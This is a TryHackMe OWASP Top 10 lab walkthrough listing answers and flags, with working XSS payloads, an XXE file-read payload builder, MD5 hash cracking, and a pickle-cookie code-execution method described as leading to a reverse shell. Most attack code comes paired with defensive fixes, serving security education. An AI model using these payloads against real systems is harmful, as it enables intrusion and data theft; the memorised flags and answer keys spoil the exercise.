
TryHackMe - OWASP Top 10 (25/09/2021)

Updated: Oct 16, 2021


Command Injection

What strange text file is in the website root directory?

To list the website root directory I injected ls through the vulnerable input. The strange text file is:

drpepper.txt

How many non-root/non-service/non-daemon users are there?

We can use the command:

cat /etc/passwd | cut -d: -f1

It shows only the first field of each line, the account name. That alone does not tell you which accounts are real users: on Ubuntu a regular user has a UID (third field) of 1000 or higher and an interactive login shell (last field), while service and daemon accounts sit below 1000 and usually have /usr/sbin/nologin or /bin/false as their shell. For more detail on the command see the LinuxHandBook article linked in the original post.

The answer here is

0

What user is this app running as?

The user the app runs as:

whoami or id will show it.

The answer for this is

www-data

What is the user's shell set as?

I used id, which prints the current user ID and group ID; www-data has UID 33. Then I read /etc/passwd, where the last field of each line is the account's login shell:

cat /etc/passwd

It prints every account in the file, and we already know the username to look for. The www-data line ends with

/usr/sbin/nologin
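As an added example (my own Python, not part of the room's material), here is the same check done properly over a passwd file: count the accounts that are neither root nor service/daemon accounts, and look up a user's shell. The file content below is a constructed excerpt, not the machine's real /etc/passwd; its www-data line matches what the room shows (UID 33, shell /usr/sbin/nologin).

```python
"""Added example: classify /etc/passwd entries instead of just listing names.

cut -d: -f1 prints every account name but cannot separate real users from
service accounts. The UID (field 3) and the login shell (field 7) can:
Debian/Ubuntu allocate human users from UID 1000, 'nobody' is 65534, and
service accounts get a non-interactive shell.
"""

# Constructed passwd excerpt (sample data for the example, not the room's file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Return one dict per account from passwd-formatted text."""
    accounts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than crash
        name, _pw, uid, gid, _gecos, home, shell = fields
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid),
                         "home": home, "shell": shell})
    return accounts


def regular_users(text):
    """Accounts that are neither root nor service/daemon accounts.

    Rule: UID between 1000 and 65533 and an interactive shell.
    """
    return [a["name"] for a in parse_passwd(text)
            if 1000 <= a["uid"] < 65534 and a["shell"] not in NON_LOGIN_SHELLS]


def shell_of(text, username):
    """Login shell of `username`, or None if the account is not present."""
    for a in parse_passwd(text):
        if a["name"] == username:
            return a["shell"]
    return None


if __name__ == "__main__":
    print("regular users:", regular_users(SAMPLE_PASSWD))
    print("www-data shell:", shell_of(SAMPLE_PASSWD, "www-data"))
```

Feed it the real file with regular_users(open("/etc/passwd").read()) on a box you have a shell on; the count is the answer the room asks for, and shell_of gives the nologin answer without scanning the file by eye.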

What version of Ubuntu is running?

Either of these commands prints the OS version.

cat /etc/os-release

prints comprehensive information about the operating system, or you can just use



lsb_release -a

Here we see the version as

18.04.4.



Print out the MOTD. What favorite beverage is shown?

On Ubuntu the MOTD is built from the scripts in /etc/update-motd.d/, so printing those files shows the beverage:

Dr Pepper


Broken Authentication



What is the flag that you found in darren's account?


fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur's account?

d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure



What is the name of the mentioned directory?


Click the Login link, then inspect the page source. A comment left in the source mentions the directory:



/assets


DB File:

Knowing the site has an /assets directory, I added it to the URL. The directory listing shows webapp.db, a database file.

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db





Sensitive Data:

Click "webapp.db" and save it for later use.

We can open it with sqlite3 and check what it contains.

I had never worked with SQL before, so a word of advice: end every statement with ";". Otherwise sqlite3 assumes the statement continues on the next line.


Use the supporting material to access the sensitive data. What is the password hash of the admin user?



6eea9b7ef19179a06954edd0f6c05ceb


Admin Password:

I used the CrackStation website mentioned in the supporting material to crack the hash.

It is clearly the whole top letter row of a QWERTY keyboard:


Crack the hash.

What is the admin's plaintext password?



qwertyuiop
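As an added example (my own Python, not part of the room's material), here is the same procedure scripted: open the SQLite file, pull the username and password columns, and try a wordlist against the unsalted MD5 hashes. The room's webapp.db is not embedded; the script builds an in-memory stand-in with an assumed users(userID, username, password, admin) table carrying the admin hash from above, and the wordlist is made up for the example.

```python
"""Added example: dump hashes from a leaked SQLite database and crack them.

The admin row holds the hash shown on the page; the other row and the
wordlist are constructed for the example. The table layout is assumed.
"""
import hashlib
import sqlite3

ADMIN_HASH = "6eea9b7ef19179a06954edd0f6c05ceb"  # from the page
WORDLIST = ["password", "123456", "letmein", "qwertyuiop", "admin"]  # constructed


def build_sample_db():
    """In-memory stand-in for webapp.db (assumed schema, constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userID TEXT, username TEXT, password TEXT, admin INTEGER)"
    )
    conn.execute("INSERT INTO users VALUES ('1', 'admin', ?, 1)", (ADMIN_HASH,))
    conn.execute("INSERT INTO users VALUES ('2', 'bob', ?, 0)",
                 (hashlib.md5(b"letmein").hexdigest(),))
    conn.commit()
    return conn


def dump_hashes(conn):
    """{username: password_hash}, the same rows SELECT shows in the sqlite3 shell."""
    rows = conn.execute("SELECT username, password FROM users").fetchall()
    return {user: pw for user, pw in rows}


def crack_md5(target_hex, wordlist):
    """Unsalted MD5: hash each candidate and compare; None if nothing matches."""
    target_hex = target_hex.strip().lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


def crack_all(conn, wordlist):
    """Crack every hash in the users table."""
    return {user: crack_md5(h, wordlist) for user, h in dump_hashes(conn).items()}


if __name__ == "__main__":
    db = build_sample_db()
    for user, pw in crack_all(db, WORDLIST).items():
        print(f"{user}: {pw if pw else '<not in wordlist>'}")
```

Against the real file, replace build_sample_db() with sqlite3.connect("webapp.db") and point WORDLIST at rockyou.txt; CrackStation does the same lookup against a far bigger precomputed list, which is why the unsalted hash falls instantly.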


Admin Flag:


Login as the admin. What is the flag?


THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}


XML External Entity

[Severity 4] XML External Entity - eXtensible Markup Language


Full form of XML


Extensible Markup Language

Is it compulsory to have XML prolog in XML documents?


no

Can we validate XML documents against a schema?


yes

How can we specify XML version and encoding in XML document?



XML prolog

[Severity 4] XML External Entity - DTD

How do you define a new ELEMENT?


!ELEMENT

How do you define a ROOT element?


!DOCTYPE

How do you define a new ENTITY?


!ENTITY

[Severity 4] XML External Entity - Exploiting


What is the name of the user in /etc/passwd?


falcon

Where is falcon's SSH key located?


/home/falcon/.ssh/id_rsa

What are the first 18 characters of falcon's private key?


MIIEogIBAAKCAQEA7
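To make the DTD questions and the exploiting task concrete, an added example in Python (mine, not the room's): a function that builds the external-entity payload used to read /etc/passwd and falcon's key, and the check a hardened parser makes before it parses untrusted XML. The element names in the payload are assumed; nothing is sent to any server, the functions only produce and inspect strings.

```python
"""Added example: build an XXE payload and reject DTDs on the defending side.

Assumed target shape: the application reads <root><name>...</name></root>
and echoes the name element back, so whatever the entity expands to is
disclosed in the response.
"""
import re
import xml.etree.ElementTree as ET


def xxe_payload(path, element="name"):
    """XML whose DTD declares an external entity (!ENTITY ... SYSTEM) for `path`.

    A parser that resolves external entities substitutes the file's
    contents for &xxe;. /etc/passwd reveals the user names (falcon in the
    room); /home/falcon/.ssh/id_rsa then exposes the private key.
    """
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        f'<root><{element}>&xxe;</{element}></root>'
    )


_DTD_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(xml_text):
    """True when the document carries a DOCTYPE or ENTITY declaration."""
    return _DTD_RE.search(xml_text) is not None


def safe_parse(xml_text):
    """Parse untrusted XML only if it contains no DTD at all.

    Refusing every DOCTYPE is the simplest hardening: without a DTD there
    is no way to declare an entity, external or otherwise.
    """
    if has_dtd(xml_text):
        raise ValueError("DTD/entity declarations are not allowed in user-supplied XML")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    print(xxe_payload("/etc/passwd"))
    try:
        safe_parse(xxe_payload("/home/falcon/.ssh/id_rsa"))
    except ValueError as err:
        print("rejected:", err)
    print(safe_parse("<root><name>falcon</name></root>").find("name").text)
```

The payload is what you paste into the room's XML form; the rejection check is what the form's backend should have done. A real deployment would also disable entity resolution in the parser library itself, since a regex is a coarse pre-filter rather than a parser.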

Broken Access Control

[Severity 5] Broken Access Control (IDOR Challenge)


Look at other users notes. What is the flag?



flag{fivefourthree}

[Severity 6] Security Misconfiguration


Hack into the webapp, and find the flag!



thm{4b9513968fd564a87b28aa1f9d672e17}

Cross-site Scripting

[Severity 7] Cross-site Scripting


Navigate to http://Machine/ in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".

<script>alert("Hello")</script>

ThereIsMoreToXSSThanYouThink

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

I took a payload from https://github.com/payloadbox/xss-payload-list and edited it to my needs. window.location.hostname has to be passed to alert unquoted; quoting it would pop up the literal text instead of the address:

<script>alert(window.location.hostname)</script>

ReflectiveXss4TheWin

Now navigate to http://10.10.*.*/ in your browser and click on the "Stored XSS" tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.

HTML_T4gs

On the same page, make an alert popup with your document cookies appear on the page.

"><s"%2b"cript>alert(document.cookie)</script>

This payload shows document.cookie in a popup, and the answer then appears in the comment field.

You can also use

test" onmouseover="alert(document.cookie)"

to get your answer:

W3LL_D0N3_LVL2


Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.


<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

websites_can_be_easily_defaced_with_xss
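Why these payloads work, and what fixes them, as an added example in Python (mine, not the room's code): a stored comment rendered straight into HTML versus the same comment HTML-escaped first. The template (a div with a title attribute) is assumed for the example; the payloads are the ones from this section.

```python
"""Added example: stored XSS, vulnerable rendering beside the escaped version.

The template is assumed. Rendering into two contexts (attribute value and
element body) shows why quote escaping matters as much as tag escaping.
"""
import html

# Payloads from this section of the write-up, used here as constructed input.
PAYLOADS = [
    '<script>alert(document.cookie)</script>',
    'test" onmouseover="alert(document.cookie)"',
    "<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>",
]

# Assumed server-side template: the comment lands in an attribute and in the body.
TEMPLATE = '<div class="comment" title="{title}">{body}</div>'


def render_unsafe(comment):
    """Interpolates user input directly: any markup in it becomes live HTML."""
    return TEMPLATE.format(title=comment, body=comment)


def render_safe(comment):
    """Escapes <, >, & and both quote characters before interpolation.

    quote=True matters for the attribute context: without it the
    `test" onmouseover=...` payload still breaks out of the title attribute.
    """
    escaped = html.escape(comment, quote=True)
    return TEMPLATE.format(title=escaped, body=escaped)


def extra_tags(rendered):
    """Number of '<' beyond the two the template itself contributes."""
    return rendered.count("<") - 2


def attribute_breakout(rendered):
    """True if the output has more double quotes than the template's own four."""
    return rendered.count('"') != 4


if __name__ == "__main__":
    for p in PAYLOADS:
        print("unsafe:", render_unsafe(p))
        print("safe:  ", render_safe(p))
        print("extra tags", extra_tags(render_unsafe(p)), "->", extra_tags(render_safe(p)))
```

The two checks are deliberately crude; they only show that the escaped output carries nothing the browser would treat as a tag or attribute boundary. In practice use the templating engine's auto-escaping rather than hand-rolled html.escape calls, and keep the Content-Security-Policy as a second layer so an alert(document.cookie) that does slip through has nothing to steal.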

Insecure Deserialization

[Severity 8] Insecure Deserialization

Who developed the Tomcat application?


The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?


Denial of Service

[Severity 8] Insecure Deserialization - Objects


Select the correct term for the following statement:

If a dog was sleeping, would this be:

A) A State (data; the dog's food, for example, is a state) or B) A Behaviour (an action; the dog eating its food is a behaviour)?

A Behaviour

[Severity 8] Insecure Deserialization - Deserialization


What is the name of the base-2 formatting that data is sent across a network as?


binary


[Severity 8] Insecure Deserialization - Cookies


If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?


webapp.com/login

What is the acronym for the web technology that Secure cookies work over?


HTTPS

[Severity 8] Insecure Deserialization - Cookies Practical


1st flag (cookie value)

The first flag is in the session cookie; it only needs to be base64-decoded.

2nd flag (admin dashboard)

Change http://ip into http://ip/admin; the admin page shows the flag.

THM{heres_the_admin_flag}

[Severity 8] Insecure Deserialization - Code Execution

I downloaded the script from the link in the task and changed the IP and port to my VPN address.

I copied the base64 value it printed and set it as the value of the encodedPayload cookie in the browser's developer tools (Inspect element).

I already had netcat listening on port 4444, and after reloading the page the server connected back and gave me a shell on the website's host.

From there flag.txt is not difficult to find; after searching around I found it.

Answer:

4a69a7ff9fd68
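What actually happens when the server unpickles that cookie, as an added example in Python (mine, not the room's script, and it does not reproduce the reverse shell): decoding the base64 session cookie for the first flag, a pickle object whose __reduce__ runs a callable during loads(), and a JSON-plus-HMAC cookie that cannot execute anything. The callable here is the harmless str.upper; the real payload swaps in os.system with a reverse-shell command. The cookie name, the signing secret and the sample flag are assumptions.

```python
"""Added example: why a base64 pickle cookie is remote code execution, and
the safe alternative. Secret, cookie name and flag text are constructed.
"""
import base64
import hashlib
import hmac
import json
import pickle


def encode_base64_cookie(text):
    """Helper so the example can round-trip a constructed cookie value."""
    return base64.b64encode(text.encode()).decode()


def decode_base64_cookie(value):
    """First flag: the session cookie is plain base64, so decoding reveals it."""
    return base64.b64decode(value).decode()


class RunOnLoad:
    """pickle calls __reduce__'s callable with its args inside loads()."""

    def __init__(self, func, args):
        self.func, self.args = func, args

    def __reduce__(self):
        return (self.func, self.args)


def make_payload_cookie(func, *args):
    """What goes into encodedPayload: base64 of a pickled RunOnLoad object."""
    return base64.b64encode(pickle.dumps(RunOnLoad(func, args))).decode()


def vulnerable_loads(cookie):
    """The server side the room exploits: it trusts and unpickles the cookie."""
    return pickle.loads(base64.b64decode(cookie))


# --- hardened version: JSON data plus an HMAC so tampering is detected ---
SECRET = b"example-server-secret"  # assumption: lives only on the server


def sign_session(data):
    """Serialise with JSON (data only, no code) and append a SHA-256 HMAC."""
    body = base64.urlsafe_b64encode(json.dumps(data).encode()).decode()
    mac = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{mac}"


def verify_session(cookie):
    """Return the session dict if the MAC matches, otherwise None."""
    try:
        body, mac = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


if __name__ == "__main__":
    print(decode_base64_cookie(encode_base64_cookie("THM{example_flag}")))  # constructed
    evil = make_payload_cookie(str.upper, "code ran during pickle.loads")
    print(vulnerable_loads(evil))
    good = sign_session({"user": "noot", "admin": False})
    print(verify_session(good))
    print(verify_session(good[:-1] + ("0" if good[-1] != "0" else "1")))
```

Swap str.upper for os.system and the argument for a reverse-shell one-liner and you have the room's payload; the listener on 4444 receives the connection the moment the server calls pickle.loads. The signed JSON cookie removes the problem at the root: json.loads builds dicts and lists, never objects with callables, and the HMAC means a client cannot even change admin to true without being detected.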

[Severity 9] Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

We need an RCE, and the last result in the exploit search might work.

Locate it with the locate command, which shows the absolute path of the file; copy it to your working directory and run it.

Running the script without arguments shows what it needs: only the target URL.

With that, we are in, and wc -c /etc/passwd gives the answer:

1611


[Severity 10] Insufficient Logging and Monitoring


What IP address is the attacker using?


49.99.13.16

What kind of attack is being carried out?


brute force
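The detection a monitoring rule would have run over this log, as an added example in Python (mine, not from the room): count 401 responses per source address and flag addresses above a threshold. The log lines are constructed sample data in an assumed "status reason date time user ip" layout; the attacker address is the one from the answer above. The classification step goes a little beyond the room by separating brute force (few accounts, many attempts) from password spraying (many accounts, few attempts each).

```python
"""Added example: spot a login brute force in an access log.

Constructed sample log; the layout (status, reason, date, time, user, ip)
is assumed for the example.
"""
from collections import Counter, defaultdict

SAMPLE_LOG = """\
200 OK           12/12/2021 10:03:02 jr22   198.51.100.4
200 OK           12/12/2021 10:05:17 amr    203.0.113.9
401 Unauthorized 12/12/2021 11:03:05 admin  49.99.13.16
401 Unauthorized 12/12/2021 11:03:06 admin  49.99.13.16
401 Unauthorized 12/12/2021 11:03:07 admin  49.99.13.16
401 Unauthorized 12/12/2021 11:03:08 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:09 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:10 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:11 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:12 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:13 root   49.99.13.16
401 Unauthorized 12/12/2021 11:03:14 root   49.99.13.16
200 OK           12/12/2021 11:04:00 jr22   198.51.100.4
"""


def parse_log(text):
    """Yield (status, user, ip) from whitespace-separated log lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # blank or malformed line
        yield parts[0], parts[-2], parts[-1]


def failed_logins_by_ip(text):
    """Number of 401 responses per source address."""
    failures = Counter()
    for status, _user, ip in parse_log(text):
        if status == "401":
            failures[ip] += 1
    return failures


def detect_brute_force(text, threshold=5):
    """Addresses with at least `threshold` failures, with the accounts they tried."""
    failures = failed_logins_by_ip(text)
    users = defaultdict(set)
    for status, user, ip in parse_log(text):
        if status == "401":
            users[ip].add(user)
    return {ip: {"failures": n, "users": sorted(users[ip])}
            for ip, n in failures.items() if n >= threshold}


def classify(text, threshold=5):
    """Few accounts hammered from one address is brute force; many is spraying."""
    return {ip: ("brute force" if len(info["users"]) <= 3 else "password spraying")
            for ip, info in detect_brute_force(text, threshold).items()}


if __name__ == "__main__":
    for ip, info in detect_brute_force(SAMPLE_LOG).items():
        print(ip, info, classify(SAMPLE_LOG)[ip])
```

The threshold is the tunable part: ten failures in ten seconds from one address against admin and root is unambiguous, which is exactly why the room calls the lack of alerting on it insufficient logging and monitoring.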


